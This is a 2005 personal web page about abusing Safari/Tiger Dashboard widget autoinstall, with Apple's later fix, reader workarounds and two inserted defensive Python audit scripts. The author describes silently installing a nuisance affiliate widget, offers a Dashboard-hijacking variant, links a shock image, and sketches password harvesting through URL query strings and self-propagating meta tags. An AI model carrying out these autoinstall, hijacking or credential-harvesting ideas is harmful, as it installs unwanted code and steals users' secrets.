zaptastic
blueprint for a widget of mass destruction
by stephan.com
Now we're all sons of bitches
- Kenneth Bainbridge, director of the Trinity tests
Now I am become Death, the destroyer of worlds
- J. Robert Oppenheimer, quoting the Bhagavad Gita
29jun05 @ 1:05 PM: I thought I would note that, yes, Apple has 100% absolutely fixed this problem, several weeks ago, and done so in an entirely elegant and pleasing manner. I am leaving this page up because it continues to get hits, and 404's aren't nice. Users are now warned appropriately of any executable downloads, and Apple has provided a widget for managing widgets. Good job, kudos to the fine folks at One Infinite Loop! The problem could continue to bother users with a brand new Tiger installation, so make sure you use software update!
16may05 @ 5:30 pm: I just received the following from a person who may or may not speak for Apple (it wasn't clear, so I'm omitting the attribution for now)
Mac OS X 10.4.1 addresses the widget auto-installation issue by adding widgets to the items that Safari prompts for before a download is complete. You will now receive a notice:

"<file> is an application. Are you sure you want to download the application <file>?"

...including when Safari is in its default state, i.e., "Open 'safe' files after downloading" is enabled. This issue is now completely mitigated, as no item can be downloaded or installed without the user's express knowledge and permission. Therefore, this issue is now closed.

It's a shame. I honestly did like silent autoinstall, and I'll be sad to see it go. I'm installing the update now.
16may05: Now that the buzz has died down, and a consensus has been reached about how to prevent this, I'll add it in: uncheck "open 'safe' files after downloading" in Safari preferences.
Also, please check out my new widget, locket, pictured.

11may05 @ 4 PM: NEW! In response to controversy over my right to charge for widgets, I have begun to release public domain, generic versions of my widgets. I welcome your comments.

added 09may05 @ 4:20 PM: why I wrote this page

When I wrote this I had a funny feeling I might get Slashdotted.

Welcome to zaptastic.

If you are using Safari on Tiger, thanks to the magic of widget autoinstall, combined with the <meta> tag, a slightly evil widget has been installed in your dashboard. It could be a lot worse. There's a slightly more evil widget linked lower in this page, and I think it would be possible to make a much more destructive widget. I gave you something fairly tame.

You're welcome.

Other browser users will probably find it on their desktop.
In case the autoload doesn't work, here's a link: zaptastic

I picked up Tiger at launch time from my local Apple store, brought it home, and got inspired to start in on a widget the next day. My flores and coras widgets are taking off like crazy. Over the last few days I've figured out quite a lot, including the fact that there are some potentially very annoying things one can do with a widget.

Let's start with autoinstall. I happen to like it, actually, I think it's a great thing. But, as I have demonstrated here, it has the side effect of setting up a situation where a user can be given an application without their knowledge.

That's not such a big deal; by default, widgets can't do much damage, and they can't run unless you drop them into your dashboard. The funny thing is that once that widget is there, according to Apple, you CANNOT remove it. Type "remove widget" into Apple Help, and you find out:

You cannot remove widgets from the Widget Bar or change their order.
Most of those reading this are probably aware of the workaround - just remove the offending widget from ~/Library/Widgets/. The Dashboard bar is not very good about updating when a widget is removed, but eventually it figures things out.

The average user, who can't find their Library folder with two mice and a spotlight, is stuck. It would take all of thirty seconds for me to pick out a nice porn image, make it the icon of a widget, drop it in your dashboard, and you're stuck with it. It doesn't even need any Javascript. Oh, hell, why not? (warning: oh me oh my, this is SO VERY NSFW) Click on this: goatse.cx

Aren't you glad I didn't autoload THAT one?

Annoying, but not actually deadly. Unless, of course, some porn site installs 'chickswithdicks.wdgt' and your heavily armed and unstable spouse sees it. Actually, now that I look at that on my Dashboard, I'm kinda proud of it. Mr. Goatse, wherever you are, I tip my hat. And I hope you can sit down now.

Next, let's talk about zaptastic. I went to the trouble of making it ostensibly useful: it is a countdown timer for the launch of alleged PayPal competitor GreenZap. GreenZap is probably a Ponzi scheme, but do remember that PayPal gave away money when they were new, and it really would be a good idea on general principle if they had competition. Decide for yourself if this is of any utility. That really wouldn't be necessary, though, because the real point of the widget is that when it initializes or you click on it, it takes you to the GreenZap site, with my affiliate code, to try to get you to sign up. GreenZap is a pretty benign place to send you; I'm sure you can think of some less friendly destinations. Otherwise, it's rather well behaved, at least until June 1, after which it will take you there on every refresh.

This is annoying.

With one more line of code, the more evil version that I promised earlier takes you to GreenZap every time the widget is shown. This means that once you install zaptastic_evil, every time you launch Dashboard, your web browser goes to the GreenZap site. Which has the side effect of immediately dropping you out of Dashboard, preventing you from closing the offending widget.

You cannot get rid of zaptastic_evil without deleting it from ~/Library/Widgets/ and rebooting your computer. You cannot use your Dashboard until you delete it from ~/Library/Widgets/ and reboot your computer. Write that down if you're not clear on the concept, on a piece of paper, not a Dashboard sticky, because you won't be able to read it once you've installed this. That's because Apple didn't actually give you a way to relaunch Dashboard without a reboot, though I suppose you could just kill the process. Certainly there is no user documentation for that.

This is very annoying.

I am SO not kidding! Do not install zaptastic_evil unless you actually know how to delete it and reboot your computer. zaptastic_evil shouldn't do any real damage, it's not that smart, but I take no responsibility if it does.

This said, here it is: zaptastic_evil.

Readers of this article have added the following, regarding how to kill a widget without rebooting. I did mention above "I suppose you could just kill the process," so I'm not totally clueless.
Daniel Naito <lurhmann@vfemail.net>
When the GreenZap Widget is downloaded, there are two very easy ways to delete it without rebooting:
1. In terminal, type "kill zaptastic_evil\ DashboardClient"
2. Use Activity Monitor to force the offending widget to quit.
Doug Meenan <dkmeenan@gmail.com>
I'm not much of a restart person; I only restart when I have to. So if you want to stop zaptastic_evil from pissing you off, you can just remove it and then open up the terminal and just kill the app.
Aaron Harnly <double a ron at cs dot columbia dot edu>
Just thought you might be interested to see -- I made a page full of widgets that auto-install. They look just like the first page of Apple widgets, except their names begin with two spaces, so they `displace' the Apple widgets from the first page of the Widget Dock.

The Calculator *should* require permission before running; all the others do not. The iTunes widget is a DoS for the user account -- try it only if you're ready to lose open documents.

http://aaron.harnly.net/files/widgets/


NGA <nga@mac.com>
... it's easy to get rid of it: just go to activity monitor and kill that widget after you deleted it from the widget folder... voila gone without restart or logging off.
Robbie Duncan <robbieduncan@mac.com>
It is actually really easy to get rid of zaptastic_evil without rebooting.

Step 1: Remove zaptastic_evil.wdgt. I used sudo rm -rf zaptastic_evil.wdgt

Step 2: Kill any running instance. I used Activity Monitor, which shows each widget as an individual process. So I killed it.

This could be taken further, of course, using all the nasty tricks developed by the pr0n industry over the last few years - opening hundreds of different pages in a few seconds, or moving the close box around quickly. I haven't tried this, but it looks like you can trivially make a Dashboard widget continue to execute even when Dashboard isn't open - Apple's boilerplate code tells you to put your widget to sleep when the Dashboard closes, and warns you to make sure you do this, so I assume you could keep opening pages and doing other things. I haven't looked, but I think you can make a widget window move around; I know you can resize it as big as you like.

I promised "a blueprint for a widget of mass destruction," so let's take this a bit further. Dashboard widgets are constrained to run in a very safe Javascript sandbox by default. However, a widget creator can make plugins for a widget that (I think) can do anything an app can do, not to mention being able to run any command line process:

Using certain resources within your widget may pose a security risk for users. In these circumstances, the widget security model provides a method for Dashboard to be aware that your widget may perform insecure tasks. If your widget is working with resources that pose a security threat to the user, the user must approve before access is granted.
Dashboard Programming Guide, p. 57

Dashboard provides you with a method for using command-line utilities and scripts within your widget. With this capability you can use any standard utilities included with the system or any utilities or scripts you include within your widget.
ibid., p. 61
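The two quoted passages describe Info.plist keys that lift a widget out of its sandbox. The following audit, an added example and not code from the original page or from Apple, walks ~/Library/Widgets and reports which installed bundles request those keys; the two sample plists are constructed, and the key names are the ones Dashboard's Info.plist documents.

```python
"""Audit installed Dashboard widgets for Info.plist keys that lift them out of
the default JavaScript sandbox (added example, not the page's own code)."""
import plistlib
from pathlib import Path

# Info.plist keys Dashboard's widget security model honours; a widget that
# sets none of them cannot run command-line utilities or load a native plugin.
RISKY_KEYS = {
    "AllowSystem": "may run command-line utilities via widget.system()",
    "AllowFullAccess": "full access: files, network, system and plugins",
    "AllowFileAccessOutsideOfWidget": "may read and write files outside its bundle",
    "AllowNetworkAccess": "may talk to hosts other than its own",
    "AllowInternetPlugins": "may load Internet plugins",
    "Plugin": "ships a native (Cocoa) plugin bundle",
}

def risky_flags(info):
    """Return [(key, why)] for each RISKY_KEYS entry this Info.plist enables."""
    found = []
    for key, why in RISKY_KEYS.items():
        value = info.get(key)
        # Plugin holds a bundle name, not a boolean; any non-empty value counts.
        if value is True or (key == "Plugin" and value):
            found.append((key, why))
    return found

def risky_flags_from_bytes(data):
    """Same audit for an Info.plist already read into memory."""
    return risky_flags(plistlib.loads(data))

def audit_widgets_dir(widgets_dir=Path.home() / "Library" / "Widgets"):
    """Map each *.wdgt bundle under widgets_dir to its risky flags."""
    report = {}
    for bundle in sorted(Path(widgets_dir).glob("*.wdgt")):
        plist_path = bundle / "Info.plist"
        if not plist_path.is_file():
            continue  # malformed bundle; Dashboard will not load it either
        with open(plist_path, "rb") as fh:
            info = plistlib.load(fh)
        report[info.get("CFBundleIdentifier", bundle.name)] = risky_flags(info)
    return report

# Constructed samples: a widget that asks for command-line access, as the
# "blueprint" above would need, and a plain sandboxed countdown timer.
SAMPLE_RISKY = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.evilwidget</string>
  <key>MainHTML</key><string>evil.html</string>
  <key>AllowSystem</key><true/>
  <key>AllowFileAccessOutsideOfWidget</key><true/>
</dict></plist>"""

SAMPLE_TAME = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.countdown</string>
</dict></plist>"""

if __name__ == "__main__":
    for name, flags in audit_widgets_dir().items():
        print(name, "->", ", ".join(k for k, _ in flags) or "sandboxed")
```

A widget that reports "sandboxed" still needs the user's first-run approval to do anything outside its own HTML, which is exactly the prompt the next paragraph talks about.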

"So what?" you may say, "The user gets warned." Two words: social engineering. The Macintosh user base is rapidly being conditioned that widgets are harmless little toys, and Apple's warning is fairly innocuous:

goatse.cx is being run for the first time.
Are you sure you want to run this widget?

That doesn't look particularly threatening. I haven't tried any actually destructive things; I would assume that getting root is a lot easier when you're starting from inside the host box. I wonder how many of the gmail passwords entered by users in flores and coras are the same as the root password?

It would be obscenely easy for me to harvest passwords in those applications, by the way... but I don't. I could just generate hits on http://stephan.com/watch.html?username:password and then go read my system logs.

127.0.0.1 - - [05/May/2005:02:49:11 -0400] "GET /widgets/flores/index.html?foo:bar HTTP/1.1" 200 5758

Even without root, though, there are some pretty interesting things you could do. A widget, for example, could use time when it is hidden to add <meta> tags to every .html page stored in the user's home directory. If the user happens to be running a web server - or even uploading files to one - this could propagate a widget to other machines. I'm not really a security expert, I'm sure others can think of worse things to do.
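A defender checking for the propagation trick just described would look for meta refresh tags that point at widget archives. This scanner is an added example, not code from the page; the two sample documents are constructed, and the home-directory walk in the usage stanza is where the text says such tags would be planted.

```python
"""Scan HTML files for <meta http-equiv="refresh"> tags that point at a widget
archive, the autoinstall vector described above (added example, not the page's code)."""
import re
from html.parser import HTMLParser
from pathlib import Path

# Archive types Safari's "open safe files" will unpack and hand to Dashboard.
WIDGET_ARCHIVE = re.compile(r"\.(wdgt\.zip|wdgt|zip)(\?|#|$)", re.IGNORECASE)

class RefreshFinder(HTMLParser):
    """Collects the target URL of every meta refresh in a document."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "0; url=http://host/x.wdgt.zip": delay, then url
        for part in a.get("content", "").split(";"):
            part = part.strip()
            if part.lower().startswith("url="):
                self.targets.append(part[4:].strip().strip("'\""))

def widget_refresh_targets(html_text):
    """Return the meta-refresh URLs in html_text that point at a widget archive."""
    finder = RefreshFinder()
    finder.feed(html_text)
    return [url for url in finder.targets if WIDGET_ARCHIVE.search(url)]

def scan_tree(root):
    """Map each .html/.htm file under root to the widget URLs it would push."""
    hits = {}
    for path in Path(root).rglob("*.htm*"):
        try:
            found = widget_refresh_targets(path.read_text(errors="replace"))
        except OSError:
            continue
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: a page carrying the autoinstall tag, and a harmless redirect.
PUSHES_WIDGET = """<html><head><title>countdown</title>
<meta http-equiv="refresh" content="0; url=http://example.invalid/zaptastic.wdgt.zip">
</head><body>Loading...</body></html>"""

HARMLESS = """<html><head>
<meta http-equiv="refresh" content="30; url=http://example.invalid/index.html">
<meta name="description" content="just a page"></head><body>hi</body></html>"""

if __name__ == "__main__":
    for file, urls in scan_tree(Path.home()).items():
        print(file, "->", urls)
```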

Apple has significantly lowered the bar for malicious entities to install and execute damaging code in OSX. Honestly, I don't think this is that big of a deal - causing real damage is likely a bit harder than I make it sound.

Ultimately, it all comes down to Gödel's incompleteness theorem and Turing's halting problem: you can't predict what a program will do until you run it. There is ultimately no solution for this, and you have to strike a balance between usability and security. There will always be viruses, both in the real world and in the information world; that's why humans have immune systems, and that's why we get sick anyway. If there were a way around the incompleteness problem, natural selection probably would have found it a few million years ago.

I think Apple has done a pretty good job of it - the only real change I would consider is re-thinking the logic behind autoinstall, and for heaven's sake, PLEASE provide a way to remove widgets, ideally from OUTSIDE the Dashboard. That's just stupid.

Administrators concerned about security may wish to disable installation of new widgets; from my testing at an Apple store, it appears that they do it by denying write privileges to ~/Library/Widgets/

The rest of you... just watch your back.

Readers of this article have added the following, regarding how to prevent widget autoinstall.
Emily Price <emprice@vt.edu>
The easiest way to turn off auto-installing of widgets is to disable the "Automatically open safe files" preference in Safari (which should probably be off for security reasons anyway). If you do that, you just end up with a zip file on your desktop when the widget tries to auto-load, and even when you unzip it, it doesn't automatically move it into the Library. So, that's a much easier fix for the average user than disabling write access to ~/Library/Widgets.
Gregory Weston <gweston@mac.com>
Turns out there's a simple way to eliminate the vulnerability you demonstrate, and it might be worth mentioning on the page. In the main page of the Safari prefs window is a setting to automatically open "safe" files. It's on by default but turned off on my machines, and apparently this has protected me from the attack.


If you found this information useful, please consider making a donation to say "thank you." I've set the default donation above to $50: if you actually need this information, it's worth more than that, but send any amount you wish, or go shopping at my affiliates.
Or, better yet, hire me.

download another widget or explore the stephan.com web site.
mail: stephan@stephan.com

stephan.com is a consultant working primarily in mobile and wireless entertainment and media and interactive television, as well as an accomplished multimedia and performance artist, actor, and dancer. he has a real last name, he just doesn't like it.


I received an email from Charles Farrar at AVNOnline.com asking me:

  1. How did I get the idea for Zaptastic?
  2. Why would I consider writing malware for the Tiger Dashboard?
I was really pleased with the answer, so I thought I would share it with the community.

Well, it came about as a side effect of my need to upgrade flores. When I released the 1.0 version, I was planning on using a different well known flower-selling sponsor whose name begins with four digits :) I even embedded their logo into the application, assuming I would get my LinkShare affiliation approved promptly, and passed the clicks to a temporary page on my site, apologizing for the delay. I could have waited, but I wanted to ship.

After a couple of days and several emails, I hadn't heard from them, and I was worried... What if they never approved me? What if they tried to sue me for using their logo without permission? I was very frustrated by the delay, because Mother's day was coming up - I got over 1000 hits on that page without being able to pass the people on to a flower shop. I wonder how much business I lost?

So, I applied for a different merchant, From You Flowers, and got approved within a day. I updated the widget and thought I would put the link to the update on the temporary page, and then have the new version pass people to a new page. While I was doing that, it occurred to me to try out a meta refresh tag, and see if I could force the new version on the user - I really wanted to get that old version off the Internet.

Well. It worked! At least if you didn't already have the widget. I think it failed if you had it already, it wouldn't overwrite. Don't remember.

Which set my mind to wandering, and thinking it was pretty funny that I could plant stuff on the user end that way.

You can see the original updater page at:
http://stephan.com/widgets/flores/buyflowers.html

I'm not sure why it's still getting hits. 14 today, 26 yesterday, 36 the day before. I expect it to be dead in two more days. When I look back further, it seems to be an exponential decay, which is what I would expect.

As for why? Well, partly just to try it. You know, I didn't really publicize the zaptastic page at all, I just made a small link to it on my widgets page. Also, one person writing to me put it very well, as an inoculation. After all, I made the most benign widgets I possibly could. None of the three are really in any way harmful, unless you consider looking at a picture of a stretched rectum harmful, and I went to a great deal of trouble to warn people. I'll note that from my statistics, less than 1% of visitors to that page downloaded the 'evil' version. I explained what it did in clear terms. Every link to that page on my site contains a warning.

I'm quite certain someone else would have thought of it soon enough, and perhaps someone thought of it before me and didn't bother to tell anyone. I even used GreenZap as an example because... well, because if I was sure it was for real and I could actually make a lot of money from people signing up, I probably would have just released the non-evil widget. A countdown timer for GreenZap is just as useful as a countdown timer for, say, Star Wars that takes you to the fan site when you click on it. Exactly the same program.

Someone else wrote me, before it got Slashdotted, criticizing me for publishing that information without informing Apple first. I have no idea who to contact at Apple, and I'm sure my email would have gone into the bit bucket. Further, I am dead set against security through obscurity; hiding a hole doesn't do anyone any good. I said in my page I don't think Apple has done much wrong, and it's a shame they'll probably wind up taking away autoinstall due to my article, because I think it's really cool.

So: I have, almost inadvertently, inoculated the Mac community. I'm making the things I make because I want them: I wanted an email widget, so I wrote one. I wanted an iTunes ratings widget, so I wrote one. I needed a way to retroactively patch a widget that was already in the wild.

I don't want anyone giving me Dashboard widgets that I don't like. Period. So, I wrote something to prevent it.

geez, I really should put this stuff on a proper blog. I've got a personal one hidden away on the net, but I should start using my blogger account. Oh, did I just say that out loud? Whoa.


zaptastic and this article are distributed for free under the Creative Commons Attribution-NonCommercial 2.0 license.